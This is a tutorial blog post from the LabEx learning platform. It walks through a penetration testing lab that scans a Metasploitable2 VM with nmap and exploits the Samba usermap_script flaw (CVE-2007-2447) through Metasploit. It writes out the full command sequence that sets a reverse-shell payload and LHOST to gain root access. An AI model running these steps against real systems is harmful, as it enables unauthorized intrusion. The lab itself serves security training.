Penetration Testing | Kali Linux | Metasploitable2 | Hands-on Cybersecurity Lab

LabEx
5 min readOct 25, 2024

--

Cover

Introduction

MindMap

In this lab, you will learn about the basic process of penetration testing and perform a hands-on attack using Kali Linux. The goal is to gain remote shell access to a vulnerable target system by exploiting a known Samba vulnerability. This lab provides an opportunity to understand the steps involved in a real-world penetration testing scenario and practice using popular security tools like Nmap and Metasploit.

Set up the Lab Environment

Penetration testing usually involves the following steps:

  1. Information Gathering: Collect as much information as possible about the target system, including network information, website content, directory structure, potential usernames, open ports, services, domain names, and subdomains. Various tools can be used for this purpose.
  2. Vulnerability Scanning: Use scanning tools to perform a comprehensive scan of the target system to identify vulnerabilities. Automated scanning tools are available, or manual tools can be used for targeted scanning of specific services.
  3. Exploitation: Once exploitable vulnerabilities are identified, use appropriate tools and techniques to gain higher-level access or privileges on the target system. This may involve remote code execution, injection attacks, or other methods.
  4. Maintaining Access: Create a backdoor or persistent access mechanism on the target system to facilitate future access while avoiding detection.
  5. Reporting: Analyze the findings and generate a report detailing the vulnerabilities discovered and the steps taken during the penetration testing process. This report can help the target organization to secure their systems effectively.

In summary, with an understanding of the basic steps involved in penetration testing, it’s time to put theory into practice. Through hands-on exercises, we can apply the knowledge and skills learned to gain practical experience in the field of penetration testing.

At first, you need to set up the lab environment for practicing a penetration testing scenario.

The lab environment consists of two systems:

  1. Kali Linux Container (Attacker Machine): This is a Docker container running Kali Linux, which will be used to perform the attack.
  2. Metasploitable2 Virtual Machine (Target Machine): This is a vulnerable Ubuntu server acting as the target system.

To set up the environment, follow these steps:

  1. Start the Metasploitable2 target machine:
sudo virsh start Metasploitable2
  1. Ping the target machine to ensure it’s running (use Ctrl+C to exit):
ping 192.168.122.102
  1. Start the Kali Linux container and enter the Bash shell:
docker run -ti --network host b5b709a49cd5 bash
  1. Test the network connectivity from the Kali container by pinging the target machine (use Ctrl+C to exit):
ping 192.168.122.102

Both the attacker and target machines should now be running and accessible. You are ready to begin the penetration testing process.

Perform Vulnerability Scanning

In this step, you will use the Nmap tool in Kali Linux to scan the target system for open ports and services.

  1. Run the following Nmap command to perform a comprehensive scan and save the output to /tmp/report.txt:
nmap -p 1-65535 -T4 -A -v 192.168.122.102 >/tmp/report.txt

Here’s what the flags mean:

  • -p 1-65535: Scan all ports
  • -T4: Set timing template (higher value means faster scan)
  • -A: Enable OS detection and version detection
  • -v: Increase verbosity level
  • >/tmp/report.txt: Redirect the output to a file
  1. Wait for the scan to complete (it may take a few minutes).
  2. Analyze the scan report by opening the /tmp/report.txt file with cat:
cat /tmp/report.txt

The report will list the open ports, services, and versions running on the target system.

  1. Identify any potential vulnerabilities associated with the services and versions discovered during the scan.

In this case, we will focus on the Samba service, which has a known remote command execution vulnerability (CVE-2007–2447) in the version running on the Metasploitable2 system. Here are the details of the Samba USERNAME MAP SCRIPT remote command execution vulnerability (CVE-2007–2447):

  • CVE: CVE-2007–2447
  • Affected Versions: Samba 3.0.0–3.0.25rc3
  • Vulnerability Description: The vulnerability exists in the way Samba handles the username map script configuration option. When this option is enabled, Samba fails to properly sanitize user input before passing it to the /bin/sh shell, allowing remote attackers to execute arbitrary commands as the Samba user.

The Samba official vulnerability description can be found at: http://samba.org/samba/security/CVE-2007-2447.html

The Metasploit exploit module that we will use to exploit this vulnerability is exploit/multi/samba/usermap_script. You can find the source code and comments for this module at: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/samba/usermap_script.rb

Exploit the Vulnerability using Metasploit

In this step, you will use the Metasploit Framework to exploit the Samba USERNAME MAP SCRIPT vulnerability and gain remote shell access to the target system.

  1. Start the Metasploit console:
cd ~
msfconsole
  1. Load the Samba exploit module in Metasploit console:
use exploit/multi/samba/usermap_script
  1. Set the payload to cmd/unix/reverse in Metasploit console:
set payload cmd/unix/reverse
  1. Configure the target IP address and port in Metasploit console:
set RHOST 192.168.122.102
set RPORT 445
  1. Set the local IP address for the reverse shell in Metasploit console:
set LHOST 192.168.122.1
  1. Verify the options in Metasploit console:
show options
  1. Execute the exploit in Metasploit console:
exploit

If the exploit is successful, you should have a remote shell session as the root user on the target system.

  1. After completing your testing, you can exit the shell by pressing Ctrl+C and typing exit to return to the Kali container.

Summary

In this lab, you learned about the basic process of penetration testing and gained hands-on experience in performing a real-world attack scenario. You set up a lab environment with a vulnerable target system, conducted vulnerability scanning using Nmap, analyzed a known Samba vulnerability, and exploited it using the Metasploit Framework to gain remote shell access. This practical experience will help you better understand the techniques and tools used in penetration testing, and the importance of secure system configurations and vulnerability management.

Want to Learn More?

--

--

LabEx

LabEx is an AI-assisted, hands-on learning platform for tech enthusiasts, covering Programming, Data Science, Linux and other areas.